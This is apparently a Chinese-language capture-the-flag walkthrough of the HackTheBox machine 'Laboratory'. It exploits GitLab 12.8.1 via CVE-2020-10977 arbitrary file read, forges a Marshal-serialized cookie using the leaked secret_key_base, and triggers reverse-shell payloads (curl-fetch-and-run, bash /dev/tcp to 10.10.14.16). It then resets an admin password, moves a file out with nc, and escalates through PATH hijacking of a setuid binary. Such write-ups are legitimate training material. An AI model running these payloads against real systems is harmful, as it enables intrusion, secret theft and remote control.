HTB-靶機-Laboratory

本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切后果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.216

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

信息枚舉收集
https://github.com/codingo/Reconnoitre 跟autorecon類似
autorecon 10.10.10.216 -o ./Laboratory-autorecon

sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.216
或者

sudo masscan -p1-65535,U:1-65535 10.10.10.216 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.216

得到的掃描結果

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

根據上面掃描的結果得知本次測試的目標靶機是需要通過域名訪問，將其域名加入本地hosts文件中

追加hosts文件
sudo -- sh -c "echo '10.10.10.216 laboratory.htb' >> /etc/hosts"
sudo -- sh -c "echo '10.10.10.216 git.laboratory.htb' >> /etc/hosts"

訪問這些域名

注冊用戶cntf然后訪問https://git.laboratory.htb 點擊了每個頁面，在幫助菜單里面發現版本為12.8.1的gitlab 在谷歌上搜索了一把，發現存在任意文件讀取漏洞

可參考:

https://hackerone.com/reports/827052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10977

漏洞大概利用操作就是創建兩個Project 然后新建一個issue 寫入要讀取的文件，例如下面讀取passwd文件內容

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

然后將這個issue移動到另一個新建的Project就會發現文件已經被讀取了，下載對應的文件即可，對應的exploit自動利用代碼如下
https://github.com/thewhiteh4t/cve-2020-10977

漏洞利用得到的結果

python3 cve_2020_10977.py https://git.laboratory.htb cntf cntfcntf


[>] Absolute Path to File : /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

---
production:
  db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
  secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
  otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af

過程展示

此處可以通過本地搭建gitlab環境替換secret_key_base來達到命令執行的目的，具體相關的操作

本地kali環境使用docker搭建跟目標靶機一樣的gitlab環境，搭建之前先安裝docker環境，可參考：https://zhuanlan.zhihu.com/p/82361096

sudo docker pull gitlab/gitlab-ee:12.8.1-ee.0
sudo docker run -it gitlab/gitlab-ee:12.8.1-ee.0 sh
/opt/gitlab/embedded/bin/runsvdir-start &
gitlab-rails console

nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

將secret_key_base替換為目標靶機的secret_key_base
3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3

替換完成就可以拿到cookie，寫入反彈shell命令代碼觸發反彈shell

執行下面命令進入console
gitlab-rails console

開始執行下面命令內容：

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `curl {Your_IP}/Shell.sh -o /tmp/Shell.sh && chmod 777 /tmp/Shell.sh && bash /tmp/Shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

或者

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i>& /dev/tcp/10.10.14.16/8833 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

上面在測試的過程中發現在執行倒數第三步和第四步就成功反彈shell，確認反彈的shell是本地kali搭建的gitlab，而不是目標靶機的，所以不用管，直接ctrl+c中斷執行最后兩步拿到cookie，然后觸發反彈shell代碼

拿到cookie

BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTYvODgzMyAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--ded553d0f50b56445da7778756a4f2822d1835d6

觸發反彈shell代碼
curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTYvODgzMyAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--ded553d0f50b56445da7778756a4f2822d1835d6"

成功反彈shell

上述成功之后，生成tty-shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=linux

更改密碼
user = User.find(1)
user.password = '123456789'
user.password_confirmation = '123456789'
user.save!
exit

irb(main):001:0> user = User.find(1)
user = User.find(1)
=> #<User id:1 @dexter>
irb(main):002:0> user.password = '123456789'
user.password = '123456789'
=> "123456789"
irb(main):003:0> user.password_confirmation = '123456789'
user.password_confirmation = '123456789'
=> "123456789"
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: fb1c0851-a7de-4072-b8d6-b27a65c36458) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007fea1b3254d0 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0> exit
exit

登錄目標靶機的web應用gitlab

 登錄成功之后獲得私鑰，復制到本地kali給其權限為600然后ssh登錄

拿到目標靶機權限開始信息搜集
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

根據搜集的信息發現docker-security權限是帶setuid 
-rwsr-xr-x  1 root dexter 16720 Aug 28  2020 docker-security

通過nc的方式將發現的二進制文件下載到kali

使用nc的方式將docker-security傳到本地kali ，進行分析

kali：nc -lvnp 9933 > docker-security
靶機：nc 10.10.14.16 9933 < /usr/local/bin/docker-security

使用ltrace跟蹤分析文件

kali@kali:~/Downloads/htb/laboratory$ ltrace ./docker-security
setuid(0)                                                                       = -1
setgid(0)                                                                       = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                          = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                          = 256
+++ exited (status 0) +++

發現此文件會調用chmod命令，那么我們可以通過路徑劫持來提權，可參考：https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

開始提權

將下面代碼保存為chmod.c

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}


gcc -o chmod chmod.c
scp -i laboratory_id_rsa chmod dexter@10.10.10.216:/tmp/

提權
export PATH=/tmp/:$PATH
/usr/local/bin/docker-security